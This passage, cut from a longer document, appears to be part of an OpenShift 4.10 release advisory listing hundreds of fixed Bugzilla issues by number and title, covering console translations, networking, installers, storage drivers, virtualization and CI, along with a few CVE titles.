start\n2015493 - Cloud Controller Manager Operator does not respect \u0027additionalTrustBundle\u0027 setting\n2015496 - Storage - PersistentVolumes : Claim colum value \u0027No Claim\u0027 in English\n2015498 - [UI] Add capacity when not applicable (for MCG only deployment and External mode cluster) fails to pass any info. to user and tries to just load a blank screen on \u0027Add Capacity\u0027 button click\n2015506 - Home - Search - Resources - APIRequestCount : hard to select an item from ellipsis menu\n2015515 - Kubelet checks all providers even if one is configured: NoCredentialProviders: no valid providers in chain. \n2015535 - Administration - ResourceQuotas - ResourceQuota details: Inside Pie chart \u0027x% used\u0027 is in English\n2015549 - Observe - Metrics: Column heading and pagination text is in English\n2015557 - Workloads - DeploymentConfigs : Error message is in English\n2015568 - Compute - Nodes : CPU column\u0027s values are in English\n2015635 - Storage operator fails causing installation to fail on ASH\n2015660 - \"Finishing boot source customization\" screen should not use term \"patched\"\n2015793 - [hypershift] The collect-profiles job\u0027s pods should run on the control-plane node\n2015806 - Metrics view in Deployment reports \"Forbidden\" when not cluster-admin\n2015819 - Conmon sandbox processes run on non-reserved CPUs with workload partitioning\n2015837 - OS_CLOUD overwrites install-config\u0027s platform.openstack.cloud\n2015950 - update from 4.7.22 to 4.8.11 is failing due to large amount of secrets to watch\n2015952 - RH CodeReady Workspaces Operator in e2e testing will soon fail\n2016004 - [RFE] RHCOS: help determining whether a user-provided image was already booted (Ignition provisioning already performed)\n2016008 - [4.10] Bootimage bump tracker\n2016052 - No e2e CI presubmit configured for release component azure-file-csi-driver\n2016053 - No e2e CI presubmit configured for release component azure-file-csi-driver-operator\n2016054 - No e2e CI presubmit configured for release component cluster-autoscaler\n2016055 - No e2e CI presubmit configured for release component console\n2016058 - openshift-sync does not synchronise in \"ose-jenkins:v4.8\"\n2016064 - No e2e CI presubmit configured for release component ibm-cloud-controller-manager\n2016065 - No e2e CI presubmit configured for release component ibmcloud-machine-controllers\n2016175 - Pods get stuck in ContainerCreating state when attaching volumes fails on SNO clusters. \n2016179 - Add Sprint 208 translations\n2016228 - Collect Profiles pprof secret is hardcoded to openshift-operator-lifecycle-manager\n2016235 - should update to 7.5.11 for grafana resources version label\n2016296 - Openshift virtualization : Create Windows Server 2019 VM using template : Fails\n2016334 - shiftstack: SRIOV nic reported as not supported\n2016352 - Some pods start before CA resources are present\n2016367 - Empty task box is getting created for a pipeline without finally task\n2016435 - Duplicate AlertmanagerClusterFailedToSendAlerts alerts\n2016438 - Feature flag gating is missing in few extensions contributed via knative plugin\n2016442 - OCPonRHV: pvc should be in Bound state and without error when choosing default sc\n2016446 - [OVN-Kubernetes] Egress Networkpolicy is failing Intermittently for statefulsets\n2016453 - Complete i18n for GaugeChart defaults\n2016479 - iface-id-ver is not getting updated for existing lsp\n2016925 - Dashboards with All filter, change to a specific value and change back to All, data will disappear\n2016951 - dynamic actions list is not disabling \"open console\" for stopped vms\n2016955 - m5.large instance type for bootstrap node is hardcoded causing deployments to fail if instance type is not available\n2016988 - NTO does not set io_timeout and max_retries for AWS Nitro instances\n2017016 - [REF] Virtualization menu\n2017036 - [sig-network-edge][Feature:Idling] Unidling should handle many TCP connections fails in periodic-ci-openshift-release-master-ci-4.9-e2e-openstack-ovn\n2017050 - Dynamic Plugins: Shared modules loaded multiple times, breaking use of PatternFly\n2017130 - t is not a function error navigating to details page\n2017141 - Project dropdown has a dynamic inline width added which can cause min-width issue\n2017244 - ovirt csi operator static files creation is in the wrong order\n2017276 - [4.10] Volume mounts not created with the correct security context\n2017327 - When run opm index prune failed with error removing operator package cic-operator FOREIGN KEY constraint failed. \n2017427 - NTO does not restart TuneD daemon when profile application is taking too long\n2017535 - Broken Argo CD link image on GitOps Details Page\n2017547 - Siteconfig application sync fails with The AgentClusterInstall is invalid: spec.provisionRequirements.controlPlaneAgents: Required value when updating images references\n2017564 - On-prem prepender dispatcher script overwrites DNS search settings\n2017565 - CCMO does not handle additionalTrustBundle on Azure Stack\n2017566 - MetalLB: Web Console -Create Address pool form shows address pool name twice\n2017606 - [e2e][automation] add test to verify send key for VNC console\n2017650 - [OVN]EgressFirewall cannot be applied correctly if cluster has windows nodes\n2017656 - VM IP address is \"undefined\" under VM details -\u003e ssh field\n2017663 - SSH password authentication is disabled when public key is not supplied\n2017680 - [gcp] Couldn\u2019t enable support for instances with GPUs on GCP\n2017732 - [KMS] Prevent creation of encryption enabled storageclass without KMS connection set\n2017752 - (release-4.10) obfuscate identity provider attributes in collected authentication.operator.openshift.io resource\n2017756 - overlaySize setting on containerruntimeconfig is ignored due to cri-o defaults\n2017761 - [e2e][automation] dummy bug for 4.9 test dependency\n2017872 - Add Sprint 209 translations\n2017874 - The installer is incorrectly checking the quota for X instances instead of G and VT instances\n2017879 - Add Chinese translation for \"alternate\"\n2017882 - multus: add handling of pod UIDs passed from runtime\n2017909 - [ICNI 2.0] ovnkube-masters stop processing add/del events for pods\n2018042 - HorizontalPodAutoscaler CPU averageValue did not show up in HPA metrics GUI\n2018093 - Managed cluster should ensure control plane pods do not run in best-effort QoS\n2018094 - the tooltip length is limited\n2018152 - CNI pod is not restarted when It cannot start servers due to ports being used\n2018208 - e2e-metal-ipi-ovn-ipv6 are failing 75% of the time\n2018234 - user settings are saved in local storage instead of on cluster\n2018264 - Delete Export button doesn\u0027t work in topology sidebar (general issue with unknown CSV?)\n2018272 - Deployment managed by link and topology sidebar links to invalid resource page (at least for Exports)\n2018275 - Topology graph doesn\u0027t show context menu for Export CSV\n2018279 - Edit and Delete confirmation modals for managed resource should close when the managed resource is clicked\n2018380 - Migrate docs links to access.redhat.com\n2018413 - Error: context deadline exceeded, OCP 4.8.9\n2018428 - PVC is deleted along with VM even with \"Delete Disks\" unchecked\n2018445 - [e2e][automation] enhance tests for downstream\n2018446 - [e2e][automation] move tests to different level\n2018449 - [e2e][automation] add test about create/delete network attachment definition\n2018490 - [4.10] Image provisioning fails with file name too long\n2018495 - Fix typo in internationalization README\n2018542 - Kernel upgrade does not reconcile DaemonSet\n2018880 - Get \u0027No datapoints found.\u0027 when query metrics about alert rule KubeCPUQuotaOvercommit and KubeMemoryQuotaOvercommit\n2018884 - QE - Adapt crw-basic feature file to OCP 4.9/4.10 changes\n2018935 - go.sum not updated, that ART extracts version string from, WAS: Missing backport from 4.9 for Kube bump PR#950\n2018965 - e2e-metal-ipi-upgrade is permafailing in 4.10\n2018985 - The rootdisk size is 15Gi of windows VM in customize wizard\n2019001 - AWS: Operator degraded (CredentialsFailing): 1 of 6 credentials requests are failing to sync. \n2019096 - Update SRO leader election timeout to support SNO\n2019129 - SRO in operator hub points to wrong repo for README\n2019181 - Performance profile does not apply\n2019198 - ptp offset metrics are not named according to the log output\n2019219 - [IBMCLOUD]: cloud-provider-ibm missing IAM permissions in CCCMO CredentialRequest\n2019284 - Stop action should not in the action list while VMI is not running\n2019346 - zombie processes accumulation and Argument list too long\n2019360 - [RFE] Virtualization Overview page\n2019452 - Logger object in LSO appends to existing logger recursively\n2019591 - Operator install modal body that scrolls has incorrect padding causing shadow position to be incorrect\n2019634 - Pause and migration is enabled in action list for a user who has view only permission\n2019636 - Actions in VM tabs should be disabled when user has view only permission\n2019639 - \"Take snapshot\" should be disabled while VM image is still been importing\n2019645 - Create button is not removed on \"Virtual Machines\" page for view only user\n2019646 - Permission error should pop-up immediately while clicking \"Create VM\" button on template page for view only user\n2019647 - \"Remove favorite\" and \"Create new Template\" should be disabled in template action list for view only user\n2019717 - cant delete VM with un-owned pvc attached\n2019722 - The shared-resource-csi-driver-node pod runs as \u201cBestEffort\u201d qosClass\n2019739 - The shared-resource-csi-driver-node uses imagePullPolicy as \"Always\"\n2019744 - [RFE] Suggest users to download newest RHEL 8 version\n2019809 - [OVN][Upgrade] After upgrade to 4.7.34 ovnkube-master pods are in CrashLoopBackOff/ContainerCreating and other multiple issues at OVS/OVN level\n2019827 - Display issue with top-level menu items running demo plugin\n2019832 - 4.10 Nightlies blocked: Failed to upgrade authentication, operator was degraded\n2019886 - Kuryr unable to finish ports recovery upon controller restart\n2019948 - [RFE] Restructring Virtualization links\n2019972 - The Nodes section doesn\u0027t display the csr of the nodes that are trying to join the cluster\n2019977 - Installer doesn\u0027t validate region causing binary to hang with a 60 minute timeout\n2019986 - Dynamic demo plugin fails to build\n2019992 - instance:node_memory_utilisation:ratio metric is incorrect\n2020001 - Update dockerfile for demo dynamic plugin to reflect dir change\n2020003 - MCD does not regard \"dangling\" symlinks as a files, attempts to write through them on next backup, resulting in \"not writing through dangling symlink\" error and degradation. \n2020107 - cluster-version-operator: remove runlevel from CVO namespace\n2020153 - Creation of Windows high performance VM fails\n2020216 - installer: Azure storage container blob where is stored bootstrap.ign file shouldn\u0027t be public\n2020250 - Replacing deprecated ioutil\n2020257 - Dynamic plugin with multiple webpack compilation passes may fail to build\n2020275 - ClusterOperators link in console returns blank page during upgrades\n2020377 - permissions error while using tcpdump option with must-gather\n2020489 - coredns_dns metrics don\u0027t include the custom zone metrics data due to CoreDNS prometheus plugin is not defined\n2020498 - \"Show PromQL\" button is disabled\n2020625 - [AUTH-52] User fails to login from web console with keycloak OpenID IDP after enable group membership sync feature\n2020638 - [4.7] CI conformance test failures related to CustomResourcePublishOpenAPI\n2020664 - DOWN subports are not cleaned up\n2020904 - When trying to create a connection from the Developer view between VMs, it fails\n2021016 - \u0027Prometheus Stats\u0027 of dashboard \u0027Prometheus Overview\u0027 miss data on console compared with Grafana\n2021017 - 404 page not found error on knative eventing page\n2021031 - QE - Fix the topology CI scripts\n2021048 - [RFE] Added MAC Spoof check\n2021053 - Metallb operator presented as community operator\n2021067 - Extensive number of requests from storage version operator in cluster\n2021081 - Missing PolicyGenTemplate for configuring Local Storage Operator LocalVolumes\n2021135 - [azure-file-csi-driver] \"make unit-test\" returns non-zero code, but tests pass\n2021141 - Cluster should allow a fast rollout of kube-apiserver is failing on single node\n2021151 - Sometimes the DU node does not get the performance profile configuration applied and MachineConfigPool stays stuck in Updating\n2021152 - imagePullPolicy is \"Always\" for ptp operator images\n2021191 - Project admins should be able to list available network attachment defintions\n2021205 - Invalid URL in git import form causes validation to not happen on URL change\n2021322 - cluster-api-provider-azure should populate purchase plan information\n2021337 - Dynamic Plugins: ResourceLink doesn\u0027t render when passed a groupVersionKind\n2021364 - Installer requires invalid AWS permission s3:GetBucketReplication\n2021400 - Bump documentationBaseURL to 4.10\n2021405 - [e2e][automation] VM creation wizard Cloud Init editor\n2021433 - \"[sig-builds][Feature:Builds][pullsearch] docker build where the registry is not specified\" test fail permanently on disconnected\n2021466 - [e2e][automation] Windows guest tool mount\n2021544 - OCP 4.6.44 - Ingress VIP assigned as secondary IP in ovs-if-br-ex and added to resolv.conf as nameserver\n2021551 - Build is not recognizing the USER group from an s2i image\n2021607 - Unable to run openshift-install with a vcenter hostname that begins with a numeric character\n2021629 - api request counts for current hour are incorrect\n2021632 - [UI] Clicking on odf-operator breadcrumb from StorageCluster details page displays empty page\n2021693 - Modals assigned modal-lg class are no longer the correct width\n2021724 - Observe \u003e Dashboards: Graph lines are not visible when obscured by other lines\n2021731 - CCO occasionally down, reporting networksecurity.googleapis.com API as disabled\n2021936 - Kubelet version in RPMs should be using Dockerfile label instead of git tags\n2022050 - [BM][IPI] Failed during bootstrap - unable to read client-key /var/lib/kubelet/pki/kubelet-client-current.pem\n2022053 - dpdk application with vhost-net is not able to start\n2022114 - Console logging every proxy request\n2022144 - 1 of 3 ovnkube-master pods stuck in clbo after ipi bm deployment - dualstack (Intermittent)\n2022251 - wait interval in case of a failed upload due to 403 is unnecessarily long\n2022399 - MON_DISK_LOW troubleshooting guide link when clicked, gives 404 error . \n2022447 - ServiceAccount in manifests conflicts with OLM\n2022502 - Patternfly tables with a checkbox column are not displaying correctly because of conflicting css rules. \n2022509 - getOverrideForManifest does not check manifest.GVK.Group\n2022536 - WebScale: duplicate ecmp next hop error caused by multiple of the same gateway IPs in ovnkube cache\n2022612 - no namespace field for \"Kubernetes / Compute Resources / Namespace (Pods)\" admin console dashboard\n2022627 - Machine object not picking up external FIP added to an openstack vm\n2022646 - configure-ovs.sh failure - Error: unknown connection \u0027WARN:\u0027\n2022707 - Observe / monitoring dashboard shows forbidden errors on Dev Sandbox\n2022801 - Add Sprint 210 translations\n2022811 - Fix kubelet log rotation file handle leak\n2022812 - [SCALE] ovn-kube service controller executes unnecessary load balancer operations\n2022824 - Large number of sessions created by vmware-vsphere-csi-driver-operator during e2e tests\n2022880 - Pipeline renders with minor visual artifact with certain task dependencies\n2022886 - Incorrect URL in operator description\n2023042 - CRI-O filters custom runtime allowed annotation when both custom workload and custom runtime sections specified under the config\n2023060 - [e2e][automation] Windows VM with CDROM migration\n2023077 - [e2e][automation] Home Overview Virtualization status\n2023090 - [e2e][automation] Examples of Import URL for VM templates\n2023102 - [e2e][automation] Cloudinit disk of VM from custom template\n2023216 - ACL for a deleted egressfirewall still present on node join switch\n2023228 - Remove Tech preview badge on Trigger components 1.6 OSP on OCP 4.9\n2023238 - [sig-devex][Feature:ImageEcosystem][python][Slow] hot deploy for openshift python image Django example should work with hot deploy\n2023342 - SCC admission should take ephemeralContainers into account\n2023356 - Devfiles can\u0027t be loaded in Safari on macOS (403 - Forbidden)\n2023434 - Update Azure Machine Spec API to accept Marketplace Images\n2023500 - Latency experienced while waiting for volumes to attach to node\n2023522 - can\u0027t remove package from index: database is locked\n2023560 - \"Network Attachment Definitions\" has no project field on the top in the list view\n2023592 - [e2e][automation] add mac spoof check for nad\n2023604 - ACL violation when deleting a provisioning-configuration resource\n2023607 - console returns blank page when normal user without any projects visit Installed Operators page\n2023638 - Downgrade support level for extended control plane integration to Dev Preview\n2023657 - inconsistent behaviours of adding ssh key on rhel node between 4.9 and 4.10\n2023675 - Changing CNV Namespace\n2023779 - Fix Patch 104847 in 4.9\n2023781 - initial hardware devices is not loading in wizard\n2023832 - CCO updates lastTransitionTime for non-Status changes\n2023839 - Bump recommended FCOS to 34.20211031.3.0\n2023865 - Console css overrides prevent dynamic plug-in PatternFly tables from displaying correctly\n2023950 - make test-e2e-operator on kubernetes-nmstate results in failure to pull image from \"registry:5000\" repository\n2023985 - [4.10] OVN idle service cannot be accessed after upgrade from 4.8\n2024055 - External DNS added extra prefix for the TXT record\n2024108 - Occasionally node remains in SchedulingDisabled state even after update has been completed sucessfully\n2024190 - e2e-metal UPI is permafailing with inability to find rhcos.json\n2024199 - 400 Bad Request error for some queries for the non admin user\n2024220 - Cluster monitoring checkbox flickers when installing Operator in all-namespace mode\n2024262 - Sample catalog is not displayed when one API call to the backend fails\n2024309 - cluster-etcd-operator: defrag controller needs to provide proper observability\n2024316 - modal about support displays wrong annotation\n2024328 - [oVirt / RHV] PV disks are lost when machine deleted while node is disconnected\n2024399 - Extra space is in the translated text of \"Add/Remove alternate service\" on Create Route page\n2024448 - When ssh_authorized_keys is empty in form view it should not appear in yaml view\n2024493 - Observe \u003e Alerting \u003e Alerting rules page throws error trying to destructure undefined\n2024515 - test-blocker: Ceph-storage-plugin tests failing\n2024535 - hotplug disk missing OwnerReference\n2024537 - WINDOWS_IMAGE_LINK does not refer to windows cloud image\n2024547 - Detail page is breaking for namespace store , backing store and bucket class. \n2024551 - KMS resources not getting created for IBM FlashSystem storage\n2024586 - Special Resource Operator(SRO) - Empty image in BuildConfig when using RT kernel\n2024613 - pod-identity-webhook starts without tls\n2024617 - vSphere CSI tests constantly failing with Rollout of the monitoring stack failed and is degraded\n2024665 - Bindable services are not shown on topology\n2024731 - linuxptp container: unnecessary checking of interfaces\n2024750 - i18n some remaining OLM items\n2024804 - gcp-pd-csi-driver does not use trusted-ca-bundle when cluster proxy configured\n2024826 - [RHOS/IPI] Masters are not joining a clusters when installing on OpenStack\n2024841 - test Keycloak with latest tag\n2024859 - Not able to deploy an existing image from private image registry using developer console\n2024880 - Egress IP breaks when network policies are applied\n2024900 - Operator upgrade kube-apiserver\n2024932 - console throws \"Unauthorized\" error after logging out\n2024933 - openshift-sync plugin does not sync existing secrets/configMaps on start up\n2025093 - Installer does not honour diskformat specified in storage policy and defaults to zeroedthick\n2025230 - ClusterAutoscalerUnschedulablePods should not be a warning\n2025266 - CreateResource route has exact prop which need to be removed\n2025301 - [e2e][automation] VM actions availability in different VM states\n2025304 - overwrite storage section of the DV spec instead of the pvc section\n2025431 - [RFE]Provide specific windows source link\n2025458 - [IPI-AWS] cluster-baremetal-operator pod in a crashloop state after patching from 4.7.21 to 4.7.36\n2025464 - [aws] openshift-install gather bootstrap collects logs for bootstrap and only one master node\n2025467 - [OVN-K][ETP=local] Host to service backed by ovn pods doesn\u0027t work for ExternalTrafficPolicy=local\n2025481 - Update VM Snapshots UI\n2025488 - [DOCS] Update the doc for nmstate operator installation\n2025592 - ODC 4.9 supports invalid devfiles only\n2025765 - It should not try to load from storageProfile after unchecking\"Apply optimized StorageProfile settings\"\n2025767 - VMs orphaned during machineset scaleup\n2025770 - [e2e] non-priv seems looking for v2v-vmware configMap in ns \"kubevirt-hyperconverged\" while using customize wizard\n2025788 - [IPI on azure]Pre-check on IPI Azure, should check VM Size\u2019s vCPUsAvailable instead of vCPUs for the sku. \n2025821 - Make \"Network Attachment Definitions\" available to regular user\n2025823 - The console nav bar ignores plugin separator in existing sections\n2025830 - CentOS capitalizaion is wrong\n2025837 - Warn users that the RHEL URL expire\n2025884 - External CCM deploys openstack-cloud-controller-manager from quay.io/openshift/origin-*\n2025903 - [UI] RoleBindings tab doesn\u0027t show correct rolebindings\n2026104 - [sig-imageregistry][Feature:ImageAppend] Image append should create images by appending them [Skipped:Disconnected] [Suite:openshift/conformance/parallel]\n2026178 - OpenShift Alerting Rules Style-Guide Compliance\n2026209 - Updation of task is getting failed (tekton hub integration)\n2026223 - Internal error occurred: failed calling webhook \"ptpconfigvalidationwebhook.openshift.io\"\n2026321 - [UPI on Azure] Shall we remove allowedValue about VMSize in ARM templates\n2026343 - [upgrade from 4.5 to 4.6] .status.connectionState.address of catsrc community-operators is not correct\n2026352 - Kube-Scheduler revision-pruner fail during install of new cluster\n2026374 - aws-pod-identity-webhook go.mod version out of sync with build environment\n2026383 - Error when rendering custom Grafana dashboard through ConfigMap\n2026387 - node tuning operator metrics endpoint serving old certificates after certificate rotation\n2026396 - Cachito Issues: sriov-network-operator Image build failure\n2026488 - openshift-controller-manager - delete event is repeating pathologically\n2026489 - ThanosRuleRuleEvaluationLatencyHigh alerts when a big quantity of alerts defined. \n2026560 - Cluster-version operator does not remove unrecognized volume mounts\n2026699 - fixed a bug with missing metadata\n2026813 - add Mellanox CX-6 Lx DeviceID 101f NIC support in SR-IOV Operator\n2026898 - Description/details are missing for Local Storage Operator\n2027132 - Use the specific icon for Fedora and CentOS template\n2027238 - \"Node Exporter / USE Method / Cluster\" CPU utilization graph shows incorrect legend\n2027272 - KubeMemoryOvercommit alert should be human readable\n2027281 - [Azure] External-DNS cannot find the private DNS zone in the resource group\n2027288 - Devfile samples can\u0027t be loaded after fixing it on Safari (redirect caching issue)\n2027299 - The status of checkbox component is not revealed correctly in code\n2027311 - K8s watch hooks do not work when fetching core resources\n2027342 - Alert ClusterVersionOperatorDown is firing on OpenShift Container Platform after ca certificate rotation\n2027363 - The azure-file-csi-driver and azure-file-csi-driver-operator don\u0027t use the downstream images\n2027387 - [IBMCLOUD] Terraform ibmcloud-provider buffers entirely the qcow2 image causing spikes of 5GB of RAM during installation\n2027498 - [IBMCloud] SG Name character length limitation\n2027501 - [4.10] Bootimage bump tracker\n2027524 - Delete Application doesn\u0027t delete Channels or Brokers\n2027563 - e2e/add-flow-ci.feature fix accessibility violations\n2027585 - CVO crashes when changing spec.upstream to a cincinnati graph which includes invalid conditional edges\n2027629 - Gather ValidatingWebhookConfiguration and MutatingWebhookConfiguration resource definitions\n2027685 - openshift-cluster-csi-drivers pods crashing on PSI\n2027745 - default samplesRegistry prevents the creation of imagestreams when registrySources.allowedRegistries is enforced\n2027824 - ovnkube-master CrashLoopBackoff: panic: Expected slice or struct but got string\n2027917 - No settings in hostfirmwaresettings and schema objects for masters\n2027927 - sandbox creation fails due to obsolete option in /etc/containers/storage.conf\n2027982 - nncp stucked at ConfigurationProgressing\n2028019 - Max pending serving CSRs allowed in cluster machine approver is not right for UPI clusters\n2028024 - After deleting a SpecialResource, the node is still tagged although the driver is removed\n2028030 - Panic detected in cluster-image-registry-operator pod\n2028042 - Desktop viewer for Windows VM shows \"no Service for the RDP (Remote Desktop Protocol) can be found\"\n2028054 - Cloud controller manager operator can\u0027t get leader lease when upgrading from 4.8 up to 4.9\n2028106 - [RFE] Use dynamic plugin actions for kubevirt plugin\n2028141 - Console tests doesn\u0027t pass on Node.js 15 and 16\n2028160 - Remove i18nKey in network-policy-peer-selectors.tsx\n2028162 - Add Sprint 210 translations\n2028170 - Remove leading and trailing whitespace\n2028174 - Add Sprint 210 part 2 translations\n2028187 - Console build doesn\u0027t pass on Node.js 16 because node-sass doesn\u0027t support it\n2028217 - Cluster-version operator does not default Deployment replicas to one\n2028240 - Multiple CatalogSources causing higher CPU use than necessary\n2028268 - Password parameters are listed in FirmwareSchema in spite that cannot and shouldn\u0027t be set in HostFirmwareSettings\n2028325 - disableDrain should be set automatically on SNO\n2028484 - AWS EBS CSI driver\u0027s livenessprobe does not respect operator\u0027s loglevel\n2028531 - Missing netFilter to the list of parameters when platform is OpenStack\n2028610 - Installer doesn\u0027t retry on GCP rate limiting\n2028685 - LSO repeatedly reports errors while diskmaker-discovery pod is starting\n2028695 - destroy cluster does not prune bootstrap instance profile\n2028731 - The containerruntimeconfig controller has wrong assumption regarding the number of containerruntimeconfigs\n2028802 - CRI-O panic due to invalid memory address or nil pointer dereference\n2028816 - VLAN IDs not released on failures\n2028881 - Override not working for the PerformanceProfile template\n2028885 - Console should show an error context if it logs an error object\n2028949 - Masthead dropdown item hover text color is incorrect\n2028963 - Whereabouts should reconcile stranded IP addresses\n2029034 - enabling ExternalCloudProvider leads to inoperative cluster\n2029178 - Create VM with wizard - page is not displayed\n2029181 - Missing CR from PGT\n2029273 - wizard is not able to use if project field is \"All Projects\"\n2029369 - Cypress tests github rate limit errors\n2029371 - patch pipeline--worker nodes unexpectedly reboot during scale out\n2029394 - missing empty text for hardware devices at wizard review\n2029414 - Alibaba Disk snapshots with XFS filesystem cannot be used\n2029416 - Alibaba Disk CSI driver does not use credentials provided by CCO / ccoctl\n2029521 - EFS CSI driver cannot delete volumes under load\n2029570 - Azure Stack Hub: CSI Driver does not use user-ca-bundle\n2029579 - Clicking on an Application which has a Helm Release in it causes an error\n2029644 - New resource FirmwareSchema - reset_required exists for Dell machines and doesn\u0027t for HPE\n2029645 - Sync upstream 1.15.0 downstream\n2029671 - VM action \"pause\" and \"clone\" should be disabled while VM disk is still being importing\n2029742 - [ovn] Stale lr-policy-list and snat rules left for egressip\n2029750 - cvo keep restart due to it fail to get feature gate value during the initial start stage\n2029785 - CVO panic when an edge is included in both edges and conditionaledges\n2029843 - Downstream ztp-site-generate-rhel8 4.10 container image missing content(/home/ztp)\n2030003 - HFS CRD: Attempt to set Integer parameter to not-numeric string value - no error\n2030029 - [4.10][goroutine]Namespace stuck terminating: Failed to delete all resource types, 1 remaining: unexpected items still remain in namespace\n2030228 - Fix StorageSpec resources field to use correct API\n2030229 - Mirroring status card reflect wrong data\n2030240 - Hide overview page for non-privileged user\n2030305 - Export App job do not completes\n2030347 - kube-state-metrics exposes metrics about resource annotations\n2030364 - Shared resource CSI driver monitoring is not setup correctly\n2030488 - Numerous Azure CI jobs are Failing with Partially Rendered machinesets\n2030534 - Node selector/tolerations rules are evaluated too early\n2030539 - Prometheus is not highly available\n2030556 - Don\u0027t display Description or Message fields for alerting rules if those annotations are missing\n2030568 - Operator installation fails to parse operatorframework.io/initialization-resource annotation\n2030574 - console service uses older \"service.alpha.openshift.io\" for the service serving certificates. \n2030677 - BOND CNI: There is no option to configure MTU on a Bond interface\n2030692 - NPE in PipelineJobListener.upsertWorkflowJob\n2030801 - CVE-2021-44716 golang: net/http: limit growth of header canonicalization cache\n2030806 - CVE-2021-44717 golang: syscall: don\u0027t close fd 0 on ForkExec error\n2030847 - PerformanceProfile API version should be v2\n2030961 - Customizing the OAuth server URL does not apply to upgraded cluster\n2031006 - Application name input field is not autofocused when user selects \"Create application\"\n2031012 - Services of type loadbalancer do not work if the traffic reaches the node from an interface different from br-ex\n2031040 - Error screen when open topology sidebar for a Serverless / knative service which couldn\u0027t be started\n2031049 - [vsphere upi] pod machine-config-operator cannot be started due to panic issue\n2031057 - Topology sidebar for Knative services shows a small pod ring with \"0 undefined\" as tooltip\n2031060 - Failing CSR Unit test due to expired test certificate\n2031085 - ovs-vswitchd running more threads than expected\n2031141 - Some pods not able to reach k8s api svc IP 198.223.0.1\n2031228 - CVE-2021-43813 grafana: directory traversal vulnerability\n2031502 - [RFE] New common templates crash the ui\n2031685 - Duplicated forward upstreams should be removed from the dns operator\n2031699 - The displayed ipv6 address of a dns upstream should be case sensitive\n2031797 - [RFE] Order and text of Boot source type input are wrong\n2031826 - CI tests needed to confirm driver-toolkit image contents\n2031831 - OCP Console - Global CSS overrides affecting dynamic plugins\n2031839 - Starting from Go 1.17 invalid certificates will render a cluster dysfunctional\n2031858 - GCP beta-level Role (was: CCO occasionally down, reporting networksecurity.googleapis.com API as disabled)\n2031875 - [RFE]: Provide online documentation for the SRO CRD (via oc explain)\n2031926 - [ipv6dualstack] After SVC conversion from single stack only to RequireDualStack, cannot curl NodePort from the node itself\n2032006 - openshift-gitops-application-controller-0 failed to schedule with sufficient node allocatable resource\n2032111 - arm64 cluster, create project and deploy the example deployment, pod is CrashLoopBackOff due to the image is built on linux+amd64\n2032141 - open the alertrule link in new tab, got empty page\n2032179 - [PROXY] external dns pod cannot reach to cloud API in the cluster behind a proxy\n2032296 - Cannot create machine with ephemeral disk on Azure\n2032407 - UI will show the default openshift template wizard for HANA template\n2032415 - Templates page - remove \"support level\" badge and add \"support level\" column which should not be hard coded\n2032421 - [RFE] UI integration with automatic updated images\n2032516 - Not able to import git repo with .devfile.yaml\n2032521 - openshift-installer intermittent failure on AWS with \"Error: Provider produced inconsistent result after apply\" when creating the aws_vpc_dhcp_options_association resource\n2032547 - hardware devices table have filter when table is empty\n2032565 - Deploying compressed files with a MachineConfig resource degrades the MachineConfigPool\n2032566 - Cluster-ingress-router does not support Azure Stack\n2032573 - Adopting enforces deploy_kernel/ramdisk which does not work with deploy_iso\n2032589 - DeploymentConfigs ignore resolve-names annotation\n2032732 - Fix styling conflicts due to recent console-wide CSS changes\n2032831 - Knative Services and Revisions are not shown when Service has no ownerReference\n2032851 - Networking is \"not available\" in Virtualization Overview\n2032926 - Machine API components should use K8s 1.23 dependencies\n2032994 - AddressPool IP is not allocated to service external IP wtih aggregationLength 24\n2032998 - Can not achieve 250 pods/node with OVNKubernetes in a multiple worker node cluster\n2033013 - Project dropdown in user preferences page is broken\n2033044 - Unable to change import strategy if devfile is invalid\n2033098 - Conjunction in ProgressiveListFooter.tsx is not translatable\n2033111 - IBM VPC operator library bump removed global CLI args\n2033138 - \"No model registered for Templates\" shows on customize wizard\n2033215 - Flaky CI: crud/other-routes.spec.ts fails sometimes with an cypress ace/a11y AssertionError: 1 accessibility violation was detected\n2033239 - [IPI on Alibabacloud] \u0027openshift-install\u0027 gets the wrong region (\u2018cn-hangzhou\u2019) selected\n2033257 - unable to use configmap for helm charts\n2033271 - [IPI on Alibabacloud] destroying cluster succeeded, but the resource group deletion wasn\u2019t triggered\n2033290 - Product builds for console are failing\n2033382 - MAPO is missing machine annotations\n2033391 - csi-driver-shared-resource-operator sets unused CVO-manifest annotations\n2033403 - Devfile catalog does not show provider information\n2033404 - Cloud event schema is missing source type and resource field is using wrong value\n2033407 - Secure route data is not pre-filled in edit flow form\n2033422 - CNO not allowing LGW conversion from SGW in runtime\n2033434 - Offer darwin/arm64 oc in clidownloads\n2033489 - CCM operator failing on baremetal platform\n2033518 - [aws-efs-csi-driver]Should not accept invalid FSType in sc for AWS EFS driver\n2033524 - [IPI on Alibabacloud] interactive installer cannot list existing base domains\n2033536 - [IPI on Alibabacloud] bootstrap complains invalid value for alibabaCloud.resourceGroupID when updating \"cluster-infrastructure-02-config.yml\" status, which leads to bootstrap failed and all master nodes NotReady\n2033538 - Gather Cost Management Metrics Custom Resource\n2033579 - SRO cannot update the special-resource-lifecycle ConfigMap if the data field is undefined\n2033587 - Flaky CI test project-dashboard.scenario.ts: Resource Quotas Card was not found on project detail page\n2033634 - list-style-type: disc is applied to the modal dropdowns\n2033720 - Update samples in 4.10\n2033728 - Bump OVS to 2.16.0-33\n2033729 - remove runtime request timeout restriction for azure\n2033745 - Cluster-version operator makes upstream update service / Cincinnati requests more frequently than intended\n2033749 - Azure Stack Terraform fails without Local Provider\n2033750 - Local volume should pull multi-arch image for kube-rbac-proxy\n2033751 - Bump kubernetes to 1.23\n2033752 - make verify fails due to missing yaml-patch\n2033784 - set kube-apiserver degraded=true if webhook matches a virtual resource\n2034004 - [e2e][automation] add tests for VM snapshot improvements\n2034068 - [e2e][automation] Enhance tests for 4.10 downstream\n2034087 - [OVN] EgressIP was assigned to the node which is not egress node anymore\n2034097 - [OVN] After edit EgressIP object, the status is not correct\n2034102 - [OVN] Recreate the deleted EgressIP object got InvalidEgressIP warning\n2034129 - blank page returned when clicking \u0027Get started\u0027 button\n2034144 - [OVN AWS] ovn-kube egress IP monitoring cannot detect the failure on ovn-k8s-mp0\n2034153 - CNO does not verify MTU migration for OpenShiftSDN\n2034155 - [OVN-K] [Multiple External Gateways] Per pod SNAT is disabled\n2034170 - Use function.knative.dev for Knative Functions related labels\n2034190 - unable to add new VirtIO disks to VMs\n2034192 - Prometheus fails to insert reporting metrics when the sample limit is met\n2034243 - regular user cant load template list\n2034245 - installing a cluster on 